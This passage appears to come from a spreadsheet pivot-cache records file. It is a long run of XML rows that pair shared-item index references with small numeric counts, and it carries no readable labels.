  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="222"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="222"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="222"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="222"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="222"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="18"/>
    <x v="222"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="222"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="222"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="222"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="20"/>
    <x v="222"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="222"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="222"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="223"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="223"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="223"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="223"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="223"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="223"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="223"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="223"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="223"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="223"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="1"/>
    <x v="223"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="4"/>
    <x v="223"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="223"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="223"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="224"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="224"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="224"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="224"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="224"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="224"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="8"/>
    <x v="224"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="224"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="224"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="224"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="224"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="224"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="224"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="224"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="225"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="225"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="1"/>
    <x v="225"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="225"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="225"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="225"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="225"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="225"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="225"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="225"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="6"/>
    <x v="225"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="3"/>
    <x v="225"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="225"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="225"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="226"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="226"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="226"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="226"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="226"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="5"/>
    <x v="226"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="15"/>
    <x v="226"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="226"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="226"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="226"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="226"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="30"/>
    <x v="226"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="226"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="226"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="227"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="227"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="227"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="227"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="227"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="227"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="34"/>
    <x v="227"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="41"/>
    <x v="227"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="227"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="2"/>
    <x v="227"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="227"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="227"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="227"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="227"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="228"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="228"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="228"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="228"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="8"/>
    <x v="228"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="8"/>
    <x v="228"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="14"/>
    <x v="228"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="7"/>
    <x v="228"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="228"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="228"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="17"/>
    <x v="228"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="3"/>
    <x v="228"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="228"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="3"/>
    <x v="228"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="229"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="229"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="229"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="229"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="229"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="229"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="229"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="229"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="229"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="229"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="20"/>
    <x v="229"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="5"/>
    <x v="229"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="229"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="229"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="230"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="230"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="230"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="230"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="230"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="230"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="230"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="230"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="230"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="230"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="230"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="230"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="230"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="230"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="231"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="231"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="231"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="231"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="231"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="231"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="231"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="231"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="231"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="231"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="231"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="231"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="231"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="231"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="232"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="232"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="232"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="232"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="232"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="232"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="9"/>
    <x v="232"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="232"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="232"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="232"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="3"/>
    <x v="232"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="10"/>
    <x v="232"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="232"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="232"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="4"/>
    <x v="230"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="230"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="230"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="230"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="230"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="230"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="230"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="2"/>
    <x v="230"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="25"/>
    <x v="230"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="20"/>
    <x v="230"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="233"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="233"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="233"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="233"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="233"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="8"/>
    <x v="233"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="37"/>
    <x v="233"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="83"/>
    <x v="233"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="233"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="233"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="233"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="233"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="233"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="233"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="4"/>
    <x v="234"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="10"/>
    <x v="234"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="25"/>
    <x v="234"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="8"/>
    <x v="234"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="234"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="234"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="234"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="234"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="234"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="234"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="234"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="234"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="234"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="234"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="234"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="10"/>
    <x v="234"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="25"/>
    <x v="234"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="8"/>
    <x v="234"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="235"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="235"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="235"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="235"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="235"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="235"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="235"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="235"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="235"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="235"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="235"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="235"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="7"/>
    <x v="235"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="235"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="236"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="236"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="236"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="236"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="236"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="5"/>
    <x v="236"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="236"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="236"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="236"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="236"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="236"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="15"/>
    <x v="236"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="236"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="236"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="237"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="237"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="237"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="237"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="237"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="237"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="237"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="237"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="237"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="237"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="237"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="237"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="237"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="237"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="238"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="238"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="238"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="238"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="5"/>
    <x v="238"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="5"/>
    <x v="238"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="238"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="5"/>
    <x v="238"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="238"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="238"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="238"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="238"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="238"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="238"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="239"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="239"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="239"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="239"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="239"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="239"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="239"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="239"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="239"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="239"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="239"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="239"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="239"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="239"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="240"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="240"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="240"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="240"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="240"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="240"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="240"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="240"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="240"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="240"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="240"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="240"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="240"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="240"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="241"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="241"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="241"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="241"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="241"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="241"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="241"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="241"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="241"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="241"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="241"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="241"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="241"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="241"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="242"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="242"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="242"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="242"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="242"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="242"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="242"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="242"/>
  </r>
